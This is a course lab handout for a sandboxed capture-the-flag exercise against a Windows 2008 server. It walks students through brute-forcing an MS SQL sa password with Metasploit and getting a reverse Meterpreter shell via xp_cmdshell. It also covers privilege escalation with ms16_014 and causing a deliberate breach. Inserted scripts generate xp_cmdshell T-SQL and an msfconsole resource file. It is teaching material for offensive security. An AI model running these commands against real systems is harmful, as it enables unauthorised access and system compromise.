Project-3: Privilege Escalation-2
In this project, you are assigned to gain privileged access to a Windows 2008 Server in a CTF
(Capture-the-Flag) event. You will discover that the Windows 2008 server runs an MS SQL service
whose sa account has a weak password. First, you will exploit this service with the Metasploit
Framework to gain an unprivileged shell. Then you will use the "exploit suggester" module of the
Metasploit Framework to find a local privilege escalation exploit and try to gain a privileged
shell. The first suggested exploit you try should give you a privileged shell.
Reminder
Please skim the specified chapters of the book (Metasploit 5.0 for beginners 2nd ed.) before
starting this project.
Computers
Notes:
1) You will perform all of your actions from Kali Linux.
2) You cannot copy and paste between your computer and the computers in the Netlab
environment; however, it is quicker and more reliable to press the Tab key after typing the
first 2-3 letters of each command or option in Metasploit, which auto-completes it.
3) Use Ctrl and the minus key (Ctrl -) to shrink the font in the Kali Linux terminal window; alternatively,
click View on the menu bar and then the Shrink Font menu item.
4) If you get an error like "Meterpreter session # closed. Reason: Died", terminate your reservation
and restart the lab unless otherwise specified. This error is caused by the session timing out.
In the second reservation, go through the steps more quickly.
Steps of Hacking
1) Scan the network to check for MS SQL service
2) Crack the sa password
3) Get a shell
4) Confirm that the shell is low-privileged
5) Get a high-privileged shell
6) Confirm that the shell is high-privileged
7) Cause an information security breach
The List of Actions/Commands per Step
1. Scan the network to check for MS SQL service
In this part, scan all computers in the network for the MS SQL Server service (port 1433). Use the service
detection option you used last week.
Run Nmap with the options described above and take a screenshot (or screenshots) of the result
showing that the port is open on Windows 2008.
Type the command here
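As an added example (not part of the lab handout), the following shell snippet shows the kind of scan meant above, saving Nmap's greppable output, together with a small check that pulls out only the hosts where 1433/tcp is actually reported open. Confirming the open port from the saved output, rather than eyeballing the terminal, is the check worth doing before you start the password attack. The subnet (192.0.2.0/24), the sample scan output, and the assumption that the service detection option is -sV are all constructed for this example.

```shell
#!/bin/sh
# Added example, not from the lab handout. Scan the lab subnet (assumed to be
# 192.0.2.0/24) for MS SQL with service detection (assumed: -sV), keeping the
# greppable output for later processing:
#
#   nmap -sV -p 1433 -oG mssql.gnmap 192.0.2.0/24
#
# The function below reads that greppable (-oG) output on stdin and prints
# only the hosts where the given port (default 1433) is reported "open".
mssql_hosts_from_gnmap() {
  awk -v port="${1:-1433}" '
    /^Host: / && /Ports: / {
      host = $2
      split($0, halves, "Ports: ")          # keep everything after "Ports: "
      n = split(halves[2], entries, ", ")   # one entry per scanned port
      for (i = 1; i <= n; i++) {
        # entry layout: port/state/protocol/owner/service/rpcinfo/version/
        split(entries[i], f, "/")
        if (f[1] == port && f[2] == "open") { print host; break }
      }
    }'
}

# Constructed sample of -oG output (not real scan output): one host with 1433
# open, one closed, one filtered, and one where 1433 is open but not the first
# port in the list.
SAMPLE_GNMAP=$(printf '%s\n' \
  '# Nmap 7.94 scan initiated (constructed sample)' \
  'Host: 192.0.2.10 ()  Ports: 1433/open/tcp//ms-sql-s//Microsoft SQL Server 2008 R2 10.50.1600.00; RTM/  Ignored State: closed (999)' \
  'Host: 192.0.2.20 ()  Ports: 1433/closed/tcp//ms-sql-s///' \
  'Host: 192.0.2.30 ()  Ports: 1433/filtered/tcp//ms-sql-s///' \
  'Host: 192.0.2.40 ()  Ports: 445/open/tcp//microsoft-ds///, 1433/open/tcp//ms-sql-s///' \
  '# Nmap done (constructed sample)')

# Prints 192.0.2.10 and 192.0.2.40. In the lab you would instead run:
#   mssql_hosts_from_gnmap 1433 < mssql.gnmap
printf '%s\n' "$SAMPLE_GNMAP" | mssql_hosts_from_gnmap 1433
```

Only hosts whose 1433 entry is in state "open" are listed; "closed" and "filtered" hosts are dropped, which is exactly the distinction the screenshot in this step has to show.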
2. Crack the sa password
sa is the most privileged account on a SQL Server instance (the built-in sysadmin login). Attackers
routinely target this account, as you will in this part. You will use Metasploit to crack the password of
the sa account with a dictionary attack.
Command Notes
gunzip /usr/share/wordlists/rockyou.txt.gz Decompress the password dictionary (rockyou.txt)
msfconsole Open Metasploit
search mssql_login Find a relevant Metasploit module
Type the command here Type in the required command
show options See the list of available options. Confirm that the
username option is already set to "sa".
You still need to set some other options.
Type the command here Set the remote host (the SQL Server) to connect to;
the Metasploit module will then try passwords
against it remotely, one dictionary entry at a time.
Type the command here Check the username option; if it shows anything
other than sa, change it to sa.
set pass_file /usr/share/wordlists/rockyou.txt This is the password list (dictionary) you
decompressed above. You will use it to crack the
password.
set verbose false Type in this command if you don't want to see a
message for all failed login attempts.
run Take a screenshot of the terminal window
showing the password of the sa account.
Note: write this password down; you will use it
later on.
This command takes about 80 seconds to
complete.
3. Get a shell
In this part, you will try to get a shell on Windows 2008 using the xp_cmdshell procedure on MS
SQL Server. xp_cmdshell is a dangerous extended stored procedure that lets SQL Server run operating
system commands. It runs in the security context of the SQL Server service account, so from SQL Server
you can run Windows commands and perform operations like copying files, creating folders, and many
others, with whatever privileges that service account has. It is disabled by default, but a sysadmin login
such as sa can turn it on.
In this part, you will use a Metasploit exploit module that uses xp_cmdshell to upload and run a payload
that gives you a shell.
search mssql_payload Search Metasploit for the mssql_payload module
use exploit/windows/mssql/mssql_payload This is the Metasploit exploit module that uses the
xp_cmdshell procedure on MS SQL Server to run a payload
show options See the possible options for this payload. By
default, the username option has already been
set as “sa”.
Type the command here Did you notice that the RHOSTS option is blank?
Set it to the IP address of the Windows 2008 server.
RPORT is already set to 1433.
Type the command here Set the password option to the sa password you
cracked in the previous part
set payload windows/x64/meterpreter/reverse_tcp You have to set the payload explicitly, even though
it is not listed among the module options you just
viewed. Note that mssql_payload only uses the
xp_cmdshell procedure to drop and start the payload
on the target; the payload itself (a reverse TCP
Meterpreter) then connects back to your Kali
machine and carries the session. Think of the analog
RC car and its remote control from Project-1: the
exploit is the car, and the listener on Kali is the
remote control, so you must tell the payload where
to connect back.
Type the command here Set the local host option: the IP address of your
Kali machine, which the payload connects back to.
set lport 443 Set the local port the payload connects back to.
run or exploit You should be getting a shell after running the
exploit.
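What mssql_payload does on the SQL side, as an added example that is not part of the lab handout or of Metasploit itself: a shell function that prints the T-SQL for each stage so you can feed it to any SQL client (the sqlcmd invocation in the comment is an assumed usage; the host and password are placeholders). It shows the defender's check of whether xp_cmdshell is enabled, the sp_configure calls that enable it, a command run through it, and the hardening step that turns it back off. Because the command is embedded in a T-SQL string literal, a helper doubles any single quotes so the command cannot break out of the literal.

```shell
#!/bin/sh
# Added example, not from the lab handout. Prints the T-SQL behind the
# xp_cmdshell technique; feed the output to a SQL client, for instance
# (assumed usage):
#   xp_cmdshell_tsql run 'whoami' > cmd.sql
#   sqlcmd -S 192.0.2.10 -U sa -P '<cracked password>' -i cmd.sql

# T-SQL string literals escape a single quote by doubling it, so the command
#   echo it's
# must become
#   'echo it''s'
# or the statement breaks (or worse, does something you did not intend).
tsql_quote() {
  printf "'%s'" "$(printf '%s' "$1" | sed "s/'/''/g")"
}

xp_cmdshell_tsql() {
  mode=$1; shift
  case $mode in
    check)
      # Defender's check: value_in_use = 1 means xp_cmdshell is enabled.
      cat <<'EOF'
SELECT name, value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell';
EOF
      ;;
    enable)
      # sp_configure requires a sysadmin login (sa is one). This is the step
      # that turns a database login into operating system command execution.
      cat <<'EOF'
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EOF
      ;;
    run)
      # The command runs as the SQL Server service account.
      printf 'EXEC master..xp_cmdshell %s;\n' "$(tsql_quote "$1")"
      ;;
    disable)
      # Hardening: turn xp_cmdshell off again and hide advanced options.
      cat <<'EOF'
EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
EXEC sp_configure 'show advanced options', 0; RECONFIGURE;
EOF
      ;;
    *)
      echo "usage: xp_cmdshell_tsql check|enable|run <cmd>|disable" >&2
      return 2
      ;;
  esac
}

# Stand-alone run: the attacker's sequence, then the cleanup a defender wants.
xp_cmdshell_tsql check
xp_cmdshell_tsql enable
xp_cmdshell_tsql run "whoami"
xp_cmdshell_tsql run "echo it's running"
xp_cmdshell_tsql disable
```

The check query is the one to keep: if value_in_use is 1 on a server nobody intentionally configured that way, someone has probably already done what this lab does.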
4. Confirm that the shell is low-privileged
Now try some commands to check your privilege level on the shell.
Commands Notes
shell Switch to a native Windows 2008 command shell
whoami See the name of the user you are running as.
It is probably a low-privileged account. Let's try
something that requires privileges.
Type the command here Try to add a user account from the command
line.
Take a screenshot of the terminal window
showing the result (it should be denied).
exit Exit the Windows 2008 shell and return to the
Meterpreter shell
5. Get a high-privileged shell
In this part, you will use the exploit suggester module to find some exploits for privilege escalation,
and then use one of these exploits.
background Background the Meterpreter session. Don't forget to
note the id of the session.
search suggester Search for the keyword "suggester" to find the
full name of the exploit suggester module.
Type the command here Load the suggester module you found.
show options
Type the command here Set the session option to the session id you noted.
run or exploit Run the exploit suggester. It will list local exploits
that may work on the low-privileged session to get
a high-privileged shell.
Type the command here Load the ms16_014_wmi_recv_notif exploit module
suggested by the exploit suggester.
show options
set session # Use the same session id you gave to the exploit
suggester. Remember, you are trying the exploits
suggested by local_exploit_suggester against that
session.
run or exploit After this first run, you will probably see the
message "Exploit completed, but no session was
created." A common reason is that the payload's
listener options are not yet set for your Kali
machine.
show options This time you will also see the options of the
payload (a reverse TCP shell)
Type the command here Set the first payload option (the local host)
Type the command here Set the second payload option (the local port)
run or exploit You should get a shell after running the exploit
again. It will be a Windows command shell instead
of a Meterpreter shell. (Press Enter once.)
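The step 5 sequence as an msfconsole resource script, added here as an example that is not part of the lab handout: a shell function validates the session id and listener settings, then emits the commands with LHOST and LPORT set before the first exploit run, which is what avoids the "Exploit completed, but no session was created" round trip above. The module paths are Metasploit's (post/multi/recon/local_exploit_suggester and exploit/windows/local/ms16_014_wmi_recv_notif); the IP address, port and session id are placeholders. In the Netlab environment you still type the commands by hand, but the ordering is the point.

```shell
#!/bin/sh
# Added example, not from the lab handout. Emits an msfconsole resource
# script for the privilege escalation stage. Assumed usage:
#   gen_privesc_rc 1 192.0.2.5 4444 > privesc.rc && msfconsole -q -r privesc.rc
# Arguments: backgrounded session id, Kali IP (LHOST), listener port (LPORT).
gen_privesc_rc() {
  session=$1 lhost=$2 lport=$3
  # Validate first: a wrong SESSION or LHOST does not error out inside
  # msfconsole, it just ends in "no session was created".
  case $session in
    ''|*[!0-9]*) echo "SESSION must be a number" >&2; return 1 ;;
  esac
  case $lport in
    ''|*[!0-9]*) echo "LPORT must be a number" >&2; return 1 ;;
  esac
  [ "$lport" -ge 1 ] && [ "$lport" -le 65535 ] || {
    echo "LPORT out of range" >&2; return 1
  }
  echo "$lhost" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || {
    echo "LHOST must be an IPv4 address" >&2; return 1
  }

  # Pick an LPORT that no other handler is using (the Meterpreter session
  # from step 3 used 443 in this lab).
  cat <<EOF
use post/multi/recon/local_exploit_suggester
set SESSION $session
run
use exploit/windows/local/ms16_014_wmi_recv_notif
set SESSION $session
set LHOST $lhost
set LPORT $lport
exploit
EOF
}

# Stand-alone run with placeholder values.
gen_privesc_rc 1 192.0.2.5 4444
```

The second `set SESSION` is not redundant: `use` switches to a new module with its own datastore, so the session id must be set again for the exploit, just as the handout's "set session #" line does.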
6. Confirm that the shell is high-privileged
Now check if you have the privilege to perform the dangerous actions.
whoami Take a screenshot of the terminal window
showing the username.
7. Cause an information security breach
Type the command(s) here Do something that causes a loss of
confidentiality, integrity, or availability on the
target system. Provide the details and take
screenshots. Do something different from what
you did in Project-2 (do not create a user
account).
Weekly Learning and Reflection
In two to three paragraphs (i.e., sentences, not bullet lists), using APA style citations if needed,
summarize and interact with the content covered in this project. Summarize what you did as an
attacker, what kinds of vulnerabilities you exploited, and what might have prevented these attacks. Mention
the attackers and all of the targets in your summary. You can provide topologies, sketches, or graphics if
you want. In particular, highlight what surprised, enlightened, or otherwise engaged you. You should
think and write critically, not just about what was presented but also about what you have learned through the
session. You can ask questions about the things you are confused about. Questions asked here will be
summarized and answered anonymously in the next class.
